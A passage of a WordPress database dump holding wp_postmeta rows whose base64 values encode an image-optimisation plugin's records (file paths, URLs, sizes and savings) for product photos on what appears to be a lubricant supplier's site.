ZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjIyOTUsInRpbWUiOjE0ODM1NTA5NTgsImlkIjoxOTM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0xNjAweDEwNjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjo5MzcxLCJ0aW1lIjoxNDgzNTUwOTYzLCJpZCI6MTkzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyNiwidGltZSI6MTQ4MzU1MDk2NiwiaWQiOjE5MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTIsInRpbWUiOjE0ODM1NTA5NzAsImlkIjoxOTM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI2LCJ0aW1lIjoxNDgzNTUwOTc0LCJpZCI6MTkzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4MDEsInRpbWUiOjE0ODM1NTA5NzcsImlkIjoxOTM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1ODksInRpbWUiOjE0ODM1NTA5ODAsImlkIjoxOTM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MjcsInRpbWUiOjE0ODM1NTA5ODQsImlkIjoxOTM1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28962, 1934, 'wpfc_optimisation_reduction', '1525077'); 
INSERT INTO `wp_postmeta` VALUES (28963, 1934, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UuanBnIiwid2lkdGgiOjI4NDgsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxNTI1MDY3LCJ0aW1lIjoxNDgzNTUwOTk1LCJpZCI6IjE5MzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDk5NywiaWQiOjE5MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMDAxLCJpZCI6MTkzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEwMDQsImlkIjoxOTM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMTYwMHgxNjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0xNjAweDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMDA4LCJpZCI6MTkzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEwMTEsImlkIjoxOTM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTAxMywiaWQiOjE5MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMDE1LCJpZCI6MTkzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEwMTgsImlkIjoxOTM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMDIxLCJpZCI6MTkzNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lZy1ncmVhc2UtNDUweDQ1MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWctZ3JlYXNlLTQ1MHg0NTAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiI0NTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVnLWdyZWFzZS00NTB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTAyNCwiaWQiOjE5MzR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28964, 1933, 'wpfc_optimisation_reduction', '8885'); 
INSERT INTO `wp_postmeta` VALUES (28965, 1933, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLmpwZyIsIndpZHRoIjo1MTc1LCJoZWlnaHQiOjM0NTAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTEwMjgsImlkIjoiMTkzMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MTAsInRpbWUiOjE0ODM1NTEwMzIsImlkIjoxOTMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTU2LCJ0aW1lIjoxNDgzNTUxMDM2LCJpZCI6MTkzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk0NSwidGltZSI6MTQ4MzU1MTA0MCwiaWQiOjE5MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE5ODYsInRpbWUiOjE0ODM1NTEwNDQsImlkIjoxOTMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjExLCJ0aW1lIjoxNDgzNTUxMDQ4LCJpZCI6MTkzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtZWxlY3RyaWMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzNSwidGltZSI6MTQ4MzU1MTA1MSwiaWQiOjE5MzN9LHsiZmls